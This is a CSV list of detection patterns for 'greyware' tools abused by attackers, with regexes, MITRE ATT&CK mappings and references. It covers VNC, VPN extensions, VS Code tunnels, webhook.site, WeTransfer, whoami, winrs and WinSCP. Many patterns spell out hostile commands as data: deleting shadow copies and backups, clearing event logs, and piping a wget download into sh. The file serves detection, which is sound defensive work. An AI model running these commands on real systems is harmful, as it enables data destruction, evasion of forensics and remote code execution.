"*vncviewer *.*:5901*",".{0,1000}vncviewer\s.{0,1000}\..{0,1000}\:5901.{0,1000}","greyware_tool_keyword","vncviewer","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","RMM","N/A","1","0","N/A","greyware_tools high risks of false positives","10","10","N/A","N/A","N/A","N/A"
"*VNCViewer.exe*",".{0,1000}VNCViewer\.exe.{0,1000}","greyware_tool_keyword","vncviewer","VNCViewer is an RMM tool that has been exploited by attackers to gain unauthorized remote access ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*gjknjjomckknofjidppipffbpoekiipm*",".{0,1000}gjknjjomckknofjidppipffbpoekiipm.{0,1000}","greyware_tool_keyword","VPN Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*akeehkgglkmpapdnanoochpfmeghfdln*",".{0,1000}akeehkgglkmpapdnanoochpfmeghfdln.{0,1000}","greyware_tool_keyword","VPN Master","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*foiopecknacmiihiocgdjgbjokkpkohc*",".{0,1000}foiopecknacmiihiocgdjgbjokkpkohc.{0,1000}","greyware_tool_keyword","VPN Professional","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*lnfdmdhmfbimhhpaeocncdlhiodoblbd*",".{0,1000}lnfdmdhmfbimhhpaeocncdlhiodoblbd.{0,1000}","greyware_tool_keyword","VPN PROXY MASTER","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*mpcaainmfjjigeicjnlkdfajbioopjko*",".{0,1000}mpcaainmfjjigeicjnlkdfajbioopjko.{0,1000}","greyware_tool_keyword","VPN Unlimited Free","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*kcndmbbelllkmioekdagahekgimemejo*",".{0,1000}kcndmbbelllkmioekdagahekgimemejo.{0,1000}","greyware_tool_keyword","VPN.AC","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*bibjcjfmgapbfoljiojpipaooddpkpai*",".{0,1000}bibjcjfmgapbfoljiojpipaooddpkpai.{0,1000}","greyware_tool_keyword","VPN-free.pro","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*bkkgdjpomdnfemhhkalfkogckjdkcjkg*",".{0,1000}bkkgdjpomdnfemhhkalfkogckjdkcjkg.{0,1000}","greyware_tool_keyword","VPNMatic","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*aue.rel.tunnels.api.visualstudio.com*",".{0,1000}aue\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","vscode","built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.","T1090 - T1003 - T1571","TA0010 - TA0002 - TA0009","N/A","N/A","C2","https://twitter.com/code/status/1699869087071899669","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*aue-data.rel.tunnels.api.visualstudio.com*",".{0,1000}aue\-data\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","vscode","built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.","T1090 - T1003 - T1571","TA0010 - TA0002 - TA0009","N/A","N/A","C2","https://twitter.com/code/status/1699869087071899669","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*code.exe tunnel --accept-server-license-terms --name *",".{0,1000}code\.exe\stunnel\s\-\-accept\-server\-license\-terms\s\-\-name\s.{0,1000}","greyware_tool_keyword","vscode","Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets","T1090.003 - T1059.001 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://badoption.eu/blog/2023/01/31/code_c2.html","1","0","N/A","risk of False positive","10","10","N/A","N/A","N/A","N/A"
"*global.rel.tunnels.api.visualstudio.com*",".{0,1000}global\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","vscode","Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets","T1090.003 - T1059.001 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://badoption.eu/blog/2023/01/31/code_c2.html","1","1","N/A","risk of False positive","10","10","N/A","N/A","N/A","N/A"
"*global.rel.tunnels.api.visualstudio.com*",".{0,1000}global\.rel\.tunnels\.api\.visualstudio\.com.{0,1000}","greyware_tool_keyword","vscode","built-in port forwarding. This feature allows you to share locally running services over the internet to other people and devices.","T1090 - T1003 - T1571","TA0010 - TA0002 - TA0009","N/A","N/A","C2","https://twitter.com/code/status/1699869087071899669","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.exe delete shadows*",".{0,1000}\.exe\sdelete\sshadows.{0,1000}","greyware_tool_keyword","vssadmin","inhibiting recovery by deleting backup and recovery data to prevent system recovery after an attack","T1490","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*vssadmin create shadow /for=C:*",".{0,1000}vssadmin\screate\sshadow\s\/for\=C\:.{0,1000}","greyware_tool_keyword","vssadmin","the command is used to create a new Volume Shadow Copy for a specific volume which can be utilized by an attacker to collect data from the local system","T1005","TA0009","N/A","N/A","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*vssadmin create shadow /for=C:* \Temp\*.tmp*",".{0,1000}vssadmin\screate\sshadow\s\/for\=C\:.{0,1000}\s\\Temp\\.{0,1000}\.tmp.{0,1000}","greyware_tool_keyword","vssadmin","the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.","T1003.001 - T1567.001 - T1070.004","TA0005 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*vssadmin delete shadows*",".{0,1000}vssadmin\sdelete\sshadows.{0,1000}","greyware_tool_keyword","vssadmin","inhibiting recovery by deleting backup and recovery data to prevent system recovery after an attack","T1490","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*vssadmin list shadows*",".{0,1000}vssadmin\slist\sshadows.{0,1000}","greyware_tool_keyword","vssadmin","List shadow copies using vssadmin","T1059.003 - T1059.001 - T1005","TA0002 - TA0005 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*vssadmin* Delete Shadows /All /Quiet*",".{0,1000}vssadmin.{0,1000}\sDelete\sShadows\s\/All\s\/Quiet.{0,1000}","greyware_tool_keyword","vssadmin","Deletes all Volume Shadow Copies from the system quietly (without prompts).","T1490","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*vssadmin.exe Create Shadow /for=*",".{0,1000}vssadmin\.exe\screate\sshadow\s\/for\=.{0,1000}","greyware_tool_keyword","vssadmin","the command is used to create a new Volume Shadow Copy for a specific volume which can be utilized by an attacker to collect data from the local system","T1005","TA0009","N/A","N/A","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*bhnhkdgoefpmekcgnccpnhjfdgicfebm*",".{0,1000}bhnhkdgoefpmekcgnccpnhjfdgicfebm.{0,1000}","greyware_tool_keyword","Wachee VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*wbadmin delete backup*",".{0,1000}wbadmin\sdelete\sbackup.{0,1000}","greyware_tool_keyword","wbadmin","hinder recovery efforts with wbadmin","T1485 - T1490","TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*wbadmin delete catalog -quiet*",".{0,1000}wbadmin\sdelete\scatalog\s\-quiet.{0,1000}","greyware_tool_keyword","wbadmin","delete the Windows backup utility catalog","T1565.001 - T1070 - T1490","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest*",".{0,1000}wbadmin\sDELETE\sSYSTEMSTATEBACKUP\s\-deleteOldest.{0,1000}","greyware_tool_keyword","wbadmin","Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*wbadmin DELETE SYSTEMSTATEBACKUP*",".{0,1000}wbadmin\sDELETE\sSYSTEMSTATEBACKUP.{0,1000}","greyware_tool_keyword","wbadmin","Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/webhook.site.git*",".{0,1000}\/webhook\.site\.git.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","N/A","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z"
"*@email.webhook.site*",".{0,1000}\@email\.webhook\.site.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","N/A","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z"
"*https://webhook.site/*-*-*-*",".{0,1000}https\:\/\/webhook\.site\/.{0,1000}\-.{0,1000}\-.{0,1000}\-.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","Out of band interaction domains","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z"
"*webhooksite/webhook.site*",".{0,1000}webhooksite\/webhook\.site.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","N/A","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z"
"*whcli forward --token=*-*-* --target=https://localhost*",".{0,1000}whcli\sforward\s\-\-token\=.{0,1000}\-.{0,1000}\-.{0,1000}\s\-\-target\=https\:\/\/localhost.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","N/A","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z"
"*gbfgfbopcfokdpkdigfmoeaajfmpkbnh*",".{0,1000}gbfgfbopcfokdpkdigfmoeaajfmpkbnh.{0,1000}","greyware_tool_keyword","westwind","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://we.tl/t-*",".{0,1000}https\:\/\/we\.tl\/t\-.{0,1000}","greyware_tool_keyword","wetransfer","WeTransfer is a popular file sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://wetransfer.com/api/v4/transfers/*",".{0,1000}https\:\/\/wetransfer\.com\/api\/v4\/transfers\/.{0,1000}","greyware_tool_keyword","wetransfer","WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*https://wetransfer.com/downloads/*",".{0,1000}https\:\/\/wetransfer\.com\/downloads\/.{0,1000}","greyware_tool_keyword","wetransfer","WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*ehbhfpfdkmhcpaehaooegfdflljcnfec*",".{0,1000}ehbhfpfdkmhcpaehaooegfdflljcnfec.{0,1000}","greyware_tool_keyword","WeVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*cmd* wevtutil.exe cl *",".{0,1000}cmd.{0,1000}\swevtutil\.exe\scl\s.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*for /F ""tokens=*"" %%G in ('wevtutil.exe el') DO (call :do_clear ""%%G"")*",".{0,1000}for\s\/F\s\""tokens\=.{0,1000}\""\s\%\%G\sin\s\(\'wevtutil\.exe\sel\'\)\sDO\s\(call\s\:do_clear\s\""\%\%G\""\).{0,1000}","greyware_tool_keyword","wevtutil","loops through event logs using wevtutil.exe to prepare to clear them","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/Shwmae","1","0","N/A","N/A","10","2","105","6","2024-08-12T12:28:08Z","2024-03-21T15:05:03Z"
"*wevtutil cl *",".{0,1000}wevtutil\scl\s.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wevtutil clear-log*",".{0,1000}wevtutil\sclear\-log.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wevtutil.exe cl *",".{0,1000}wevtutil\.exe\scl\s.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wevtutil.exe clear-log*",".{0,1000}wevtutil\.exe\sclear\-log.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wevtutil.exe sl * /e:false*",".{0,1000}wevtutil\.exe\ssl\s.{0,1000}\s\/e\:false.{0,1000}","greyware_tool_keyword","wevtutil","disable a specific eventlog","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A"
"*wget -O - -q http://*.jpg|sh*",".{0,1000}wget\s\-O\s\-\s\-q\shttp\:\/\/.{0,1000}\.jpg\|sh.{0,1000}","greyware_tool_keyword","wget","potential malicious command with wget (|sh)","T1566","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://x.com/CraigHRowland/status/1782938242108837896","1","0","N/A","risk of false positive","9","10","N/A","N/A","N/A","N/A"
"*wget -O - -q https://*.jpg|sh*",".{0,1000}wget\s\-O\s\-\s\-q\shttps\:\/\/.{0,1000}\.jpg\|sh.{0,1000}","greyware_tool_keyword","wget","potential malicious command with wget (|sh)","T1566","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://x.com/CraigHRowland/status/1782938242108837896","1","0","N/A","risk of false positive","9","10","N/A","N/A","N/A","N/A"
"* where /r C:\Windows\WinSxS\ *Microsoft.ActiveDirectory.Management.dll*",".{0,1000}\swhere\s\/r\sC\:\\Windows\\WinSxS\\\s.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","greyware_tool_keyword","where","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","TA0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"* -exec bypass -nop -c whoami*",".{0,1000}\s\-exec\sbypass\s\-nop\s\-c\swhoami.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*whoami /all*",".{0,1000}whoami\s\/all.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1033 - T1087 - T1069 - T1078","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*whoami /domain*",".{0,1000}whoami\s\/domain.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1033 - T1087 - T1069 - T1078","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*whoami /groups*",".{0,1000}whoami\s\/groups.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1033 - T1087 - T1069 - T1078","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*whoami /priv*",".{0,1000}whoami\s\/priv.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1033 - T1087 - T1069 - T1078","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*whoami*",".{0,1000}whoami.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0007","N/A","N/A","Discovery","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","N/A","greyware tool - risks of False positive !","1","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z"
"*whoami.exe* /groups*",".{0,1000}whoami\.exe.{0,1000}\s\/groups.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0007","N/A","N/A","Collection","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","N/A","greyware tool - risks of False positive !","8","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z"
"*cgojmfochfikphincbhokimmmjenhhgk*",".{0,1000}cgojmfochfikphincbhokimmmjenhhgk.{0,1000}","greyware_tool_keyword","Whoer VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*ggackgngljinccllcmbgnpgpllcjepgc*",".{0,1000}ggackgngljinccllcmbgnpgpllcjepgc.{0,1000}","greyware_tool_keyword","WindmillVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*hnmpcagpplmpfojmgmnngilcnanddlhb*",".{0,1000}hnmpcagpplmpfojmgmnngilcnanddlhb.{0,1000}","greyware_tool_keyword","Windscribe","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*winrs -r:*cmd /c *",".{0,1000}winrs\s\-r\:.{0,1000}cmd\s\/c\s.{0,1000}","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*winrs -r:*powershell -*",".{0,1000}winrs\s\-r\:.{0,1000}powershell\s\-.{0,1000}","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*winrs -r:*whoami*",".{0,1000}winrs\s\-r\:.{0,1000}whoami.{0,1000}","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*\CurrentVersion\Uninstall\winscp3_is1*",".{0,1000}\\CurrentVersion\\Uninstall\\winscp3_is1.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connexion with winscp - legit tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A"
"*\Program Files\WinSCP*",".{0,1000}\\Program\sFiles\\WinSCP.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connexion with winscp - legit tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Martin Prikryl\WinSCP 2\*",".{0,1000}\\SOFTWARE\\Martin\sPrikryl\\WinSCP\s2\\.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connexion with winscp - legit tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A"
"*Temp*_WinSCP--Portable.zip*",".{0,1000}Temp.{0,1000}_WinSCP\-\-Portable\.zip.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connexion with winscp - legit tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
